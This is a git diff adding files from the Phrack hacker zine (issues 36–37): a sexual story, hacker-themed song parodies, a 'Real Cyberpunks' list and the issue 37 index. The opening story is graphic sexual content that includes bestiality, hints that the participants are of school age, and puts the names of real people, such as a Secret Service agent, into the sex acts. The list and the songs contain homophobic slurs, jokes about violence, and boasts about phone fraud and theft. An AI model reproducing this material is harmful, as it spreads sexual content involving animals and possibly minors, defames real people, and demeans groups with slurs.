+   until his balls slapped her cunt lips.  I continued to suck and lick her
+   clit  until Barbera Spinelli  had two  orgasms  and Tim Foley filled her
+   tight slit  with gallons of cum.  The sight of his sticky sperm dripping
+   from her slit made me climax again and I licked her cum slickened snatch
+   until I had sucked down all of my lovers sweet cream.
+
+   Barbera Spinelli and I  moved to a  side by side  position and continued
+   to tongue fuck each others cunts as Tim Foley sat an rested watching our
+   pleasure. In no time his cock was renewed and he began to finger Barbera
+   Spinelli's  tight back  door.  Seeing  his lust  for my  friends asshole
+   and having denied this pleasure to him in our private sessions I decided
+   to let Tim Foley fuck  me in the ass.  I called him over and told him to
+   fuck my butt while Barbera Spinelli ate my pussy. Tim Foley was overcome
+   with desire as  he moved in behind  me  and gently spread  my ass cheeks
+   lowering  his  face between  the cheeks of  my ass and  probing my tight
+   asshole with his tongue.  I begged him to ream my anus with his big dick
+   and he had Barbera Spinelli guide his rock like cock up my asshole while
+   he pounded me to orgasm.  I continued to  lick Barbera Spinelli and made
+   her cum just as Tim Foley shot  his load up my ass.  The feeling  of his
+   hot sperm filling my  anus made me climax  and nearly pass out.   When I
+   regained my senses I  could feel Barbera  Spinelli's tongue  swirling in
+   and out of my anus as she collected his sperm from my asshole. Tim Foley
+   was great and  he had moved  to Barbera Spinelli's asshole and  begun to
+   lick her  tight pink  puckered asshole as I tongue  fucked her hot cunt.
+   I could tell Tim Foley  was ready again and  heard Barbera Spinelli  beg
+   him  to ram  his big  thick dick up her ass. Tim Foley got into position
+   and I  guided his  throbbing  meet  up her  sweet  tight little  asshole
+   watching  as  Tim Foley pressed it  into her until only his  balls  were
+   visible.   I  continued  my  tongue  fucking of her cunt and licking her
+   clit  as I felt  her convulse time and time again in sweet orgasm.  Soon
+   I to climaxed from her  tongue and fingering of my cunt and anus and Tim
+   Foley came filling  her tight butt with his sperm which I  gladly licked
+   up.   Tim Foley was  happy  but  drained  and  left us  to continue  our
+   games.  All in all  we made love for  three hours.  When she  left to go
+   home,  she invited me  over the next  day  to  "Play  around some more".
+
+   Saturday afternoon I went over to Barbera Spinelli's house to play.  She
+   invited me in. She was wearing a black leather mini, black blouse, black
+   fish net stockings and garters, and high heels. She was hot.  I was also
+   wearing a mini, I also  had on a halter top, and  heels. She  told me to
+   get on my knees and  look under her shirt.   What I saw was a beautiful,
+   clean shaven cunt.  I reached  up to touch her but she stopped me.   She
+   said that I would first have to touch  my own shaved cunt.  She said she
+   would  shave  me  like she  did herself  this morning.  We  went to  the
+   bathroom and she undressed  me.  What  I great  sensation it was to have
+   her shave.  When she was done she cleaned me off, grabbed me by the hand
+   and led  me to her room.  She told  me to lay on  the bed  and play with
+   my new cunt.
+
+   As I laid there, I began to  rub my cunt, what a feeling.  I  went wild.
+   It felt so good.  No pubic hair, just skin, sensitive skin.  She watched
+   me as she  got undressed.  She  got into the  bed with me  and moved her
+   cunt to where I could eat her.  She was, and still is, so sweet tasting.
+   As I ate her she played with my cunt, sticking in a finger then  rubbing
+   my clit.  She would stop  as I got to excited.   I ate her and she  came
+   twice, yet she wouldn't let me cum.  She then got up and left the  room.
+   She came back with some nylon straps and said that if I wanted to cum  I
+   would have to let her  tie me to the bed.   She said she would not  hurt
+   me.  I agreed.
+
+   She tied my  wrists and ankles  to the bed  so that I  was spread eagle.
+   She then got out a vibrator and began to work on my sensitive clit.  The
+   vibrator made me so horney, but she  would not leave it on my clit  long
+   enough to make me cum.  I tried to thrust my hips to meet the dong,  but
+   to no avail.  She would then stick the dildo in and slowly pull it  out,
+   then repeat the treatment on my  clit.  I was begging to cum.   She bent
+   between my legs and tasted my juice hole and said that I was wet  enough
+   to get my SURPRISE.  Again she left the room.  When she returned she was
+   followed by my SURPRISE.   It was her Great  Dane, Dale Drew!  She asked
+   how horney was I and I knew what she meant.  I shook my head yes.
+
+   She patted the bed and Dale Drew jumped up.  She then took the dogs nose
+   and stuck  it between my legs.  I must have  been twice  as wet  by now.
+   The dog knew exactly what to do.  He began  to lick my hole.  I couldn't
+   stand it and I came twice, right away.  This made him lick even  faster.
+   I could not  believe the feeling.  There was no  strong  probing like  a
+   humans tongue, just enough pressure and entry to do the job.  As the dog
+   continued  to eat me  out Barbera Spinelli  unfastened me  from the bed.
+   Barbera Spinelli began to play with Dale Drew's cock and I watched as it
+   began to grow stiffening in her hand until it had grown to about 8inches
+   in length.  Dale Drew was in  a frenzy by now and his hot wet tongue was
+   lapping hard and fast on my exposed cunt. Dale Drew's cock was long,thin
+   and stiff as a board as Barbera Spinelli continued to massage it and his
+   balls.  Barbera Spinelli said that she thought the  dog's cock  was hard
+   enough to  start.  She grabbed a couple of small pillows and placed them
+   under my ass.  Then guided the Dale Drew on top of me. His face was next
+   to mine, I could feel his hot breath on my face.  His hairy body resting
+   on my  stomach.  Barbera Spinelli  put her hand on  his cock  and gently
+   guided it  toward  my fuck hole.   As soon as the  dog felt  my wetness,
+   nature took  over.  He fucked me fast and very deep.  I  came again, and
+   again.  Then I felt him tense and squirt inside me.   He slipped out and
+   shot some cum  on my stomach.  Dale Drew then reversed  his position and
+   began to lap my cunt again with his long wide tongue.  With Dale Drew in
+   this  position I could  see his long  thin cock still  exposed and still
+   fairly stiff.  Not wanting the experience to end I reached up  and began
+   to  massage his  cock and balls.  The  dog  responded  at once and began
+   to fuck my  hand as he licked my hot pussy to  another orgasm.  I  asked
+   Barbera Spinelli to help me and rolled over on my stomach  spreading  my
+   legs and ass cheeks making my anus open and available to Dale Drewes wet
+   tongue. Seeing my waiting asshole Dale Drew began to lick me there while
+   Barbera  Spinelli  took  over  my  handwork  on her dogs  cock.  Barbera
+   Spinelli  moved Dale Drew around and he mounted me doggy style and began
+   to dry hump my ass.  Barbera Spinelli spread my ass further  and  guided
+   Dale Drewes long thin cock into my asshole. The tightness of my ass sent
+   Dale Drew in to ecstasy and he rammed his long thin dick  in  and out of
+   my asshole with long fast strokes.  All I can remember is the feeling of
+   his long dick probing my rectum and  driving  me to orgasm  after orgasm
+   until he filled my ass with his sticky dog cum.
+
+   As I laid there,I thanked Barbera Spinelli for what she did and told her
+   that it  was great.  Since then I  have fucked her dog twice.  He is not
+   always in the  mood and  sometimes  it  takes a  lot  of  hand  work  to
+   get him interested. I have fucked Barbera Spinelli so many times I can't
+   count them  and she I and my  lover  Tim Foley get together after school
+   almost three times a week. Barbera Spinelli now says that she thinks she
+   will try Dale Drew the next time he is ready.
+
+   I can't wait.
+
+_______________________________________________________________________________
diff --git a/phrack36/8.txt b/phrack36/8.txt
new file mode 100644
index 0000000..ae20144
--- /dev/null
+++ b/phrack36/8.txt
@@ -0,0 +1,360 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 8 of 11
+
+                      :-=>|%% Phreaks in Verse II %%|<=-:
+
+                              by Homey the Hacker
+
+
+                              \=================/
+                                Get in The Ring
+                              /=================\
+
+               [Sung to the tune of Get in The Ring by G-n-f-R]
+
+Why do you look at me when you hate me?
+Why should I look at you when you make me hate you too?
+I sense a smell of retribution in the air
+I don't even understand why the fuck you even care
+And I don't need you jealousy
+Why drag me down in your misery
+And when you stare you don't think I feel it
+But I'm gonna deal it back to you in spades
+When I'm havin phun ya know I can't conceal it
+'Cause you know you'd never cut it in my game, oh yea
+And when you're talkin about our sociology
+I'll be writin' down your obituary...History
+
+You got your agents with
+The Bellcore cash injections
+Trumped up charges and implications
+Beatin' off with your "spy" operations
+Who are you to criticize our publication
+Got your subtle manipulative devices
+Just like you, I got my vices
+I've got a thought that would be nice
+I'd like to crush your head tight in my vice...PAIN!!
+
+And that goes for all you punks in the press
+That want to start shit by spreadin' lies
+Instead of the things we said
+That means you
+Ed Schwarz at WGN Radio
+Richard Sanzda
+Gary Collins at Hour Magazine
+Geraldo River at CBS         ** [CBS being partially owned AT&T]
+What you pissed off 'cause Opra Winfrey gets more ratings that you do?
+Fuck You
+Suck my fuckin' dick
+
+You be liein' to the fuckin' public
+Tellin' them your doin' a such favor for society
+[while crack dealers like Mayor Barry who should be tried for treason
+get off with slap on the wrist. FUCK YOU!]
+While they be payin thier hard earned tax dollars
+Printin' lies, Startin' controversy
+You want to antagonize me?
+Antagonize me motherfucker
+Get in the ring motherfucker
+And I'll kick your bitchy little ass, punk
+
+I don't like you, I just hate you
+I'm gonna kick your ass, oh yea!
+
+Ha Ha Ha Ha Ha Ha Ha Ha Ha!!!!!!!
+
+You may not like our integrity
+We built a world out of anarchy
+
+And in this corner weighing in at 450 lbs, Phrack Incorporated!!!!
+
+Get in the ring!
+
+Yea, this song is dedicated to all the Phrack fuckin' Incorporated
+Fans that stuck with us through all the fucking shit
+And to all those opposed...Hmm...Well
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                \=============/
+                                 Knight Lite*
+                                /=============\
+
+                 *1/3 the calories of regular computer hackers.
+                   [Sung the tune of The Beverly Hillbillies]
+
+Come and and listen to my story 'bout boy named Craig.
+Called "Mad-hacker", but is just pullin' your leg.
+Then one day he was writin' up a Phrack.
+Down came the door with a great big crack.
+
+Foley that is, Secret Service!, FBI!
+
+Well, now old Craig's a million in debt.
+Lost his cds and his brand new 'vette.
+
+Mitch Kapor said, "There's someplace you need to be."
+So he packed up his apple and moved to DC.
+
+Washington that is!, Lawyers!, Cash flow!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                \=============/
+                                 Erik Bloodaxe
+                                /=============\
+
+                 [Sung to the tune of the Daniel Boone theme]
+
+Erik B was a ham...yes a big ham.
+He was born with an ego that was big as mountain was he.
+
+Erik B was ham...yes a big ham.
+And he told all the ladies he was hung like a mighty oak tree.
+
+>From the dark sun glasses he never takes off to the heal of his K-Mart shoes.
+The bitchenest, horniest, drunkenest man that a hacker ever knew.
+
+Erik B was a ham...yes a big ham.
+With a mouth like a sewer and so full of manure was he.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                              \================/
+                               Vanilla Holliday
+                              /================\
+
+                         [Sung to the tune of ICE ICE]
+
+
+Doc, Doc, baby! Doc, Doc, baby!
+
+Lookout!
+
+The Doc is back. King of the Phreaks, and Queen of the Hacks.
+"I'll get ya laid yet!" I say with a grin.  Meanwhile my hand goes for a spin.
+I'm a master cracker, a k-rad hacker, a good 'ole plain down and dirty wacker.
+I'll trash your credit if you diss me.  You know why?  'Cause I'm the LOD!
+
+Hit it Booyyyeeeeezzzz!!
+
+Doc Doc baby!  Doc Doc Baby!
+
+Ya, ya, go get it!
+
+Doc Doc baby! Doc Doc Baby!
+
+Straight to your mother's cousin's uncle's stepsister!
+
+Get back!  It's a hack attack!  I'm the best, and that's a fact
+I've been in Time, Newsweek--they all want me.  What's next?  M-TV!
+I'm gone today, wasn't here tomorrow, maybe I'll get a date with Charo
+Ice, yah that was me. But now I've got movie rights with LOD!
+
+Kick it!
+
+Doc Doc baby!  Doc Doc Baby!
+
+Go Doc Go Doc go!
+
+Doc Doc baby!  Doc Doc Baby!
+
+Yahhhhhhhhhh, straight to Comsec!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                 \===========/
+                                  Predit0r ][
+                                 /===========\
+
+                              [The predator rap]
+
+His name is Predat0r.  He's the editor of TAP.
+He looks like Bart Simson and he's so full of crap.
+
+Got a board call the Blitzkreig BBS.
+He wishes he was nazi serving under Herman Hess.
+
+(oh well that's all I can think of)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                           \=======================/
+                             Been Caught Phreaking
+                               c0deZ's Addiction
+                           /=======================\
+
+                  [been caught Stealing by Jane's Addiction]
+
+Been caught phreaking, once, when I was five!
+I just tried phreaking, just as simple as that
+Well it's just a simple fact
+When I want a call and I don't want to pay for it
+I dial up a code
+and I dial up a code
+
+Hey all right! I get by!
+It's mine! Mine all mine!
+hey!
+
+Yea, my girl she's one too.
+She gonna get on telenet, just type in microwire
+Get a NUA for me
+She'll call right through the outdial
+Call right throught the outdial
+
+Hey all right! I get by!
+It's mine! Mine all mine!
+Get c0dez!
+
+Sat around the terminal. Sat and laughed.
+Sat around the terminal and laughed
+And we did it just like that, did it just like that.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+                                   \======/
+                                     Hack
+                                   /======\
+
+                      [Sung to the tune of Stand by REM]
+
+Hack in the place where you live
+Now dial out
+Think about telnet, wonder why you have it now
+Hack in the place where you work
+Now dial up
+Think about tymnet, wonder why you have it
+If you are real board hack with SUN
+Carry a lap-top to help along
+
+A PAD is there to move you around
+If You're not careful your hands will be bound
+
+Hack in the place where you live
+Now dial out
+Think about telnet, wonder why you have it now
+Hack in the place where you work
+Now dial up
+Think about tymnet, wonder why you have it
+
+A PAD is there to move you around
+If you're not careful your hands will be bound
+
+If accounts were trees
+Trees would be falling
+
+Listen to reason
+Foley is calling
+             _ _
+(reapeat an (_X_) amount of times)
+
+Now Hack!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                          \==========================/
+                            I'M THE MAN WITH THE BOX
+                          /==========================\
+           [Sung to the tune of "Man in the Box" by Alice in Chains]
+
+I'm the man with the box
+Burried in my (ESS7) switch!!!
+Won't you come and save me, save me?
+
+Feed me lies, where are all your trunks?
+(Bellcore) deny your maker
+He who tries will be wasted
+Feed me lies, now you've shut your trunks!
+
+I'm the dog who phreaks
+Can't shove my tones in a switch
+Won't you come and save me?
+
+Feed me lies, where are all your trunks?
+Bellcore, deny your maker
+He who tries will be wasted
+Feed me lies, now you've shut your trunks!
+
+Feed my lies, where are all your trunks?
+Bellcore, deny your maker
+He who tries will be wasted
+Feed me lies, now you've shut your trunks!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                     \==================================/
+                       Keep on Hackin in the Free World
+                     /==================================\
+
+     [Sung to the tune of Keep on Rockin in the Free World by Neil Young]
+
+There's CERT on the sceen
+Trying to get a clue
+Hackers typin on thier screen
+Phreaks with boxes that are blue
+There's a warning sign in CUD ahead
+There's a lot of people sayin
+We'd be better of dead
+Don't feel like Satan
+But we are to them
+So I try to forget it anyway I can
+
+Keep on hackin in the free world (4x)
+
+I see a phreak in night
+With some trash in his hand
+There's an old CO
+With a garbage can
+Now he takes the trash away
+And he's gonna learn a lot
+Goes home to hack some more
+And he's not gonna a stop
+
+Keep on hackin in the free world (4x)
+
+Got a thousand points of light
+On our modems, man
+Got a brand new Lexicon in my hand
+He found department stores
+with carbon paper
+Got Crimson Death & Dispater
+They say Phrack is back
+Gonna keep hope alive
+Got codes to crack
+Got dumpsters to dive
+
+Keep on hackin in the free world (4x)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                \============/
+                                 FADE TO HACK
+                                /============\
+                               by Erik Bloodaxe
+
+              [Sung to the tune of "Fade to Black" by Metallica]
+
+Accounts just seem to fade away
+Losing access every day
+Getting lost within some shell
+I have lost the will to hack
+No more passwords left to crack
+There are no more nets for me
+I need virtual reality
+
+Nets arent what they used to be
+Someone's always logging me
+Access Barred, this cant be real
+No more packets left to steal
+Now they've installed public key
+And they're using Secure ID
+Security awareness taking dawn
+I was root, but now root's gone
+
+Rerouted my call to save myself, but it's too late
+Now I can't think, think why I should even try
+
+Yesterday seems as though it never existed
+The SS greet me warm, now I will just say goodbye
+_______________________________________________________________________________
diff --git a/phrack36/9.txt b/phrack36/9.txt
new file mode 100644
index 0000000..2b36bb8
--- /dev/null
+++ b/phrack36/9.txt
@@ -0,0 +1,268 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 9 of 11
+
+ /---------------------------------------------------------------------------\
+ |                                THE MEN FROM                               |
+ |                        M   M OOOOO N   N GGGGG OOOOO                      |
+ |                        MM MM O   O NN  N G     O   O                      |
+ |                        M M M O   O N N N G  GG O   O                      |
+ |                        M   M O   O N  NN G   G O   O                      |
+ |                        M   M OOOOO N   N GGGGG OOOOO                      |
+ |                                                                           |
+ |                               -*- present -*-                             |
+ |                                                                           |
+ |                             +-----------------+                           |
+ |                             | Real Cyberpunks |                           |
+ |                             +-----------------+                           |
+ |                                                                           |
+ |    9/24/91                                                                |
+ |                                                                           |
+ |    With all this shit in the news and now a book about cyberpunks, we have|
+ |a bunch of lame assholes who think they are cyberpunks running around      |
+ |blackening the name.  In response to this we'd created this g-file so      |
+ |everybody can tell the lamers from the real cyberpunks.  Most of these     |
+ |wanna-be cyberpunks will probably be offended by what we're going to say,  |
+ |because the description of what defines a real cyberpunk doesn't apply to  |
+ |them.  Remember though, cyberpunk is mostly an attitude (this g-file       |
+ |describes physical manifestations of this attitude), and real cyberpunks   |
+ |don't get upset over something written in a g-file.                        |
+ \---------------------------------------------------------------------------/
+
+                                   CLOTHING
+
+     - Real cyberpunks don't wear paisley, or any of that other neo-
+       futuristic, yuppie, artfag shit.
+
+     - Real cyberpunks wear military surplus clothing, non-neon colored
+       Gortex, bluejeans, boots (combat or motorycle), Factsheet-5 T-Shirts,
+       and kilts (on formal occasions).
+
+     - Real cyberpunks don't shop at Banana Republic or the "Mainframe"
+       clothing section at Sears.
+
+     - Real cyberpunks have the balls to go to Thrift Shops.
+       Corollary to the above: Anyone who makes fun of a cyberpunk shopping at
+       a thrift shop usually winds up in ICU.
+
+                                   COMPUTERS
+
+     - Real cyberpunks don't use IBM PCs or Tandy 1000s.
+
+     - Real cyberpunks that have the $$$ use 486s, and 68030s.
+
+     - Real cyberpunks that don't have the $$$ use whatever the hell they can
+       get ahold of (except IBM PCs an Tandy 1000s).
+
+     - All real Cyberpunks still own a TI-99/4A, S-100, Apple ][ w/Apple Cat,
+       or an Atari 130XE with ATR8000 & 850 interfaces as their backup
+       machine.
+
+     - Real cyberpunks program in assembler and ADA.
+
+     - Real cyberpunks think C is cute for a fuck-around language.
+
+     - Real cyberpunks think of the Amiga as a cute toy.
+
+     - Real cyberpunk SYSOPS run Stonehenge.
+
+     - Real cyberpunks realize the Apple Cat was the best modem ever made.
+
+
+                                     CARS
+
+     - Real cyberpunks drive whatever they can afford.
+
+     - Real cyberpunks never drive an unmodified vehicle.
+
+     - Real cyberpunks think Audi, BMW, and Mercedes cars serve best as rocket
+       launcher targets.
+
+     - Real cyberpunks who can afford them drive something with a V-8.
+       Corollary to the above: Real cyberpunks go to every police auction
+       in their area.
+
+                                     TECH
+
+     - All real cyberpunks have their ham license.
+
+     - Real cyberpunks know the difference between a resistor and a capacitor.
+
+     - Real cyberpunks know where to get tech cheap in their area.
+       Corollary to the above: Real cyberpunks practically live at their local
+       surplus store.
+
+     - Real cyberpunks think Radio Shack sucks, but still buy from there
+       because it's convenient.
+       Corollary to the above: Real cyberpunks put pragmatism before
+       principle.
+
+     - Real cyberpunks always carry a Leatherman Tool.
+       Corollary to the above: Real cyberpunks know what a Leatherman Tool is.
+
+     - Real cyberpunks own a dual-band HT.
+       Corollary to the above: Real cyberpunks know what a dual-band HT is.
+       Corollary to the corollary: Real cyberpunks have hosed McDonalds at
+       least once.
+
+     - Real cyberpunks know how use a TDR.
+       Corollary to the above: The have also managed to get ahold of one for
+       free.
+
+                                POLITICS & LAW
+
+     - Real cyberpunks are politically aware, but avoid getting involved in
+       that bullshit.
+
+     - Real cyberpunks think all politicians should be castrated.
+       Corollary to the above: Real cyberpunks are libertarians.
+
+     - Real cyberpunks have copies of their state's law statues.
+
+     - Real cyberpunks know the difference between the Declaration of
+       Independence and The Constitution.
+       Corollary to the above: Real cyberpunks know what both of those say.
+
+     - Real cyberpunks don't get caught.
+
+                                   KNOWLEDGE
+
+     - Real cyberpunks read 2600, Factsheet-5, Full Disclosure, Iron Feather
+       Journal, Cybertek, Radio Electronics, Circuit Cellar Ink, Computer
+       Shopper, American Survival Guide, and any 'zines about local bands in
+       their area.
+       Corollary to the above: Real cyberpunks understand what they read in
+       these publications.
+
+     - Real cyberpunks think Mondo2000, for the most part, sucks.
+
+     - Real cyberpunks learn about everything from Computers to Crossbows.
+
+     - Real cyberpunks know how to spell.
+
+     - Real cyberpunks speak at least 2 languages.
+
+                                    WEAPONS
+
+     - Real cyberpunks don't have the typical yuppie artfag fear of weapons
+       that most modem users seem to have.
+       Corollary to the above: Real cyberpunks know the value of useful
+       equipment.
+
+     - Real cyberpunks own at least one gun.
+
+     - Real cyberpunks carry Gerber, Cold Steel, SOG, AlMar, or Spyderco
+       blades.
+       Corollary to the above: Real cyberpunks think custom steel is neat, but
+       costs too much.
+
+     - Real cyberpunks have memorized The Improvised Munitions Black Book.
+
+     - Real cyberpunks know The Anarchist Cookbook is a crock of shit.
+
+     - Real cyberpunks buy everything authored by Seymour Lecker and Kurt
+       Saxon.
+
+     - Real cyberpunks keep a supply of DMSO handy.
+       Corollary to the above: Real cyberpunks know what DMSO is.
+
+                                     MUSIC
+
+     - Real cyberpunks go to The Mentors' concerts whenever they can.
+
+     - Real cyberpunks think C&C Music Factory is just a bunch of out-of-the-
+       closet homosexuals.
+
+     - Real cyberpunks don't listen to Paula Abdul.
+
+     - Real cyberpunks think Michael Jackson should be napalmed.
+       Corollary to the above: Real cyberpunks think Michael Jackson is a
+       reincarnate of his monkey Bubbles.
+
+     - Real cyberpunks think Top-40 sucks.
+
+     - Real cyberpunks listen to Ministry, The Cure, Skinny Puppy, The
+       Misfits, Rush, Pink Floyd, etc.
+
+     - In the end, real cyberpunks listen to whatever the fuck they want.
+
+                              PHREAKING & HACKING
+
+     - Real cyberpunks think codes are for fags, but use them anyway because
+       they put pragmatism before principle.
+
+     - Real cyberpunks know what TEMPEST means.
+
+     - Real cyberpunks use data-taps.
+
+     - Real cyberpunks have Internet access.
+
+     - Real cyberpunks know why Broadway Hacker invited everyone to his house.
+
+     - Real cyberpunks know what PPS really means.
+
+     - Real cyberpunks know Clifford Stoll's ex-wife is a lesbian.
+       Corollary to the above: Real cyberpunks know that Clifford Stoll is an
+       asshole.
+
+     - Real cyberpunks know just how good friends John Maxfield and Broadway
+       Hacker are.
+
+     - Real cyberpunks know who John Maxfield is and what he was arrested for.
+
+     - Real cyberpunks own a blue box, and still use it.
+       Corollary to the above: Real cyberpunks know what a blue box is, and
+       know how to use it.
+
+     - Real cyberpunks know what a TS-21 is.
+       Corollary to the above: Real cyberpunks stole their TS-21.
+
+     - Real cyberpunks have acquired a Bell System hard-hat.
+
+     - Real cyberpunks have a payphone.
+       Corollary to the above: The payphone belongs to someone else.
+
+     - Real cyberpunks on the east coast have attended at least one 2600
+       meeting.
+       Corollary to the above: Real cyberpunks who have attended a 2600
+       meeting don't go to them anymore.
+       Corollary to the corollary: Real cyberpunks are waiting for another
+       OSUNY meeting.
+       Further corollary: Real cyberpunks know what OSUNY originally stood
+       for.
+
+                                    HEALTH
+
+     - Real cyberpunks use Choline, Ginseng, and Golden Seal.
+       Corollary to the above: Real cyberpunks know what these are.
+
+     - Real cyberpunks know about the medicinal value of various plants.
+
+     - Real cyberpunks take care of themselves.
+
+     - Real cyberpunks take time away from fucking with their computers to get
+       some exercise.
+
+                                 FOOD & DRINK
+
+     - Real cyberpunks drink Jolt.
+       Corollary to the above: Real cyberpunks think Pepsi is for artfags.
+
+     - Real cyberpunks are intimately familiar with the selection at 7 -
+       Eleven, but avoid it whenever possible.
+
+     - Real cyberpunks know how to cook.
+
+     - Real cyberpunks drink Guinness Stout.
+
+     - Real cyberpunks who are under 21 distill their own.
+
+     - Real cyberpunks can go to a Supermarket and not get lost.
+
+     That's it for now, but since lamers are always finding mew ways to become
+lame, expect a Real Cyberpunks Vol. II soon.
+
+                                       Yours truly,
+                                       The Men From Mongo, 9/24/91
+                                       :OSUNY, TCO, PPS, SPS, PHALCO
+_______________________________________________________________________________
diff --git a/phrack37/1.txt b/phrack37/1.txt
new file mode 100644
index 0000000..e36d711
--- /dev/null
+++ b/phrack37/1.txt
@@ -0,0 +1,147 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Seven, File 1 of 14
+
+                              Issue XXXVII Index
+                              ___________________
+
+                               P H R A C K   3 7
+
+                                 March 1, 1992
+                              ___________________
+
+    ~Promoting The Free Exchange Of Information In The New World Disorder~
+
+                        WELCOME TO PHRACK VOLUME FOUR!
+
+                 "I'm too sexy for my Phrack... Imagine that!"
+
+Looking back at Volume III, we observe some historic dates relating to Phrack:
+
+02/24/89 - Phrack 24 released.
+01/18/90 - Knight Lightning raided by the U.S. Secret Service because he was
+           editor of Phrack.
+01/23/90 - Phiber Optik and Acid Phreak raided by U.S. Secret Service.
+02/06/90 - Knight Lightning and The Prophet indicted in Federal District Court
+           in Chicago, Illinois.  The Prophet, The Leftist, and The Ur-Vile
+           indicted in Federal District Court in Atlanta, Georgia.
+02/15/90 - Knight Lightning enters plea of NOT GUILTY.
+03/01/90 - Erik Bloodaxe, The Mentor, and Steve Jackson Games raided by U.S.
+           Secret Service.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Phrack is BACK!   Welcome to the first issue of Phrack Volume Four!  This issue
+we feature "Exploring Info-America" by The Omega and White Knight.  Other
+articles of note include TWO articles by Count Zero, Black Kat's latest
+installment on his VAX/VMS series, and information on VOS by Dr. No-Good!
+Also, starting this issue, we introduce Pirate's Cove by Rambone.  Its a new
+regular column about the pirate community.  Finally, a very special thanks goes
+out the the newest member of the Phrack Staff, Spirit Walker for the help with
+assembling this issue.
+
+There is a little surprise in Phrack Loopback.  Our old pal THE DICTATOR has
+been corresponding with Knight Lightning and myself over the nets.  Yes, you
+heard right!  Dale Drew, who played a key role in busting people during
+OPERATION SUN-DEVIL and spying on our friends at SummerCon '88 is back and
+believe it or not... he wants Phrack!  And speaking of Operation Sun-Devil,
+the federal government convicted their first defendant -- details in Phrack
+World News (Part 2).
+
+Phrack World News (Part 3) contains everything you need to know about how
+the Regional Bell Operating Companies feel about our private hobby bulletin
+boards and next issue we will have information about what YOU can do about it!
+Also, next issue watch for preliminary details for SummerCon '92!!!  Will
+ESP be there again?
+
+Before the rumor mill starts churning again, I will clarify what is happening
+with Phrack management.  Crimson Death has decided to retire from Phrack and
+start working on his new UNIX based BBS, CyberWaste!  If you are interested in
+keeping in touch with Crimson Death, you may do so by writing:
+cdeath@GNU.AI.MIT.EDU for the time being.  However, keep an eye out for the
+CyberWaste hostname; @DEMONSEED.COM!
+
+Well that's it for now.  If you are going to the Second Conference on
+Computers, Freedom, & Privacy (a/k/a CFP-2) in Washington, D.C. (March 18-20,
+1992), Knight Lightning and I will see you there!
+
+Sincerely,
+                                    Dispater
+                            phracksub@stormking.com
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                      HOW TO SUBSCRIBE TO PHRACK MAGAZINE
+
+     The distribution of Phrack is now being performed by the software called
+Listserv.  All individuals on the Phrack Mailing List prior to your receipt of
+this letter have been deleted from the list.
+
+If you would like to re-subscribe to Phrack Inc. please follow these
+instructions:
+
+1.  Send a piece of electronic mail to "LISTSERV@STORMKING.COM".  The mail
+    must be sent from the account where you wish Phrack to be delivered.
+
+2.  Leave the "Subject:" field of that letter empty.
+
+3.  The first line of your mail message should read:
+    SUBSCRIBE PHRACK <your name here>
+
+4.  DO NOT leave your address in the name field!
+    (This field is for PHRACK STAFF use only, so please use a full name)
+
+Once you receive the confirmation message, you will then be added to the Phrack
+Mailing List.  If you do not receive this message within 48 hours, send another
+message.  If you STILL do not receive a message, please contact
+"SERVER@STORMKING.COM".
+
+You will receive future mailings from "PHRACK@STORMKING.COM".
+
+If there are any problems with this procedure, please contact
+"SERVER@STORMKING.COM" with a detailed message.
+
+You should get a conformation message sent back to you on your subscription.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Phrack FTP Sites -- Here is the short list of some reliable sites.  A more
+ ~~~~~~~~~~~~~~~~    extensive list will appear next issue.
+
+Washington University in St. Louis         WUARCHIVE.WUSTL.EDU
+                                           128.252.135.4
+                                           Location: /doc/policy/pub/cud/Phrack
+
+Electronic Frontier Foundation             EFF.ORG
+                                           192.88.144.3
+                                           Location: /pub/cud/Phrack
+
+University of Chicago                      CHSUN1.SPC.UCHICAGO.EDU
+                                           128.135.46.7
+                                           Location: /pub/cud/phrack
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by Dispater                                                08K
+ 2. Phrack Loopback by Phrack Staff                                         15K
+ 3. Pirate's Cove by Rambone                                                08K
+ 4. Exploring Information-America by The Omega & White Knight               51K
+ 5. Beating The Radar Rap Part 1 of 2 by Dispater                           44K
+ 6  Card-O-Rama: Magnetic Stripe Technology and Beyond by Count Zero        44K
+ 7. Users Guide to VAX/VMS Part 2 of 3 by Black Kat                         25K
+ 8. Basic Commands for the VOS System by Dr. No-Good                        10K
+ 9. The CompuServe Case by Electronic Frontier Foundation                   06K
+10. PWN Special Report VI on WeenieFest '92 by Count Zero                   14K
+11. PWN/Part 1 by Dispater and Spirit Walker                                31K
+12. PWN/Part 2 by Dispater and Spirit Walker                                30K
+13. PWN/Part 3 by Dispater and Spirit Walker                                29K
+14. PWN/Part 4 by Dispater and Spirit Walker                                31K
+                                                                   Total = 346K
+One last thing...  Ninja Master, this one's for you!
+
+               "But you see you are not anybody.  You are nobody.
+                 And you chose to be so of your own free will.
+               Legally -- officially -- you simply don't exist!"
+
+                          From "The Shockwave Rider"
diff --git a/phrack37/10.txt b/phrack37/10.txt
new file mode 100644
index 0000000..22f7752
--- /dev/null
+++ b/phrack37/10.txt
@@ -0,0 +1,213 @@
+           PWN ^*^ PWN ^*^ PWN { WeenieFest'92 } PWN ^*^ PWN ^*^ PWN
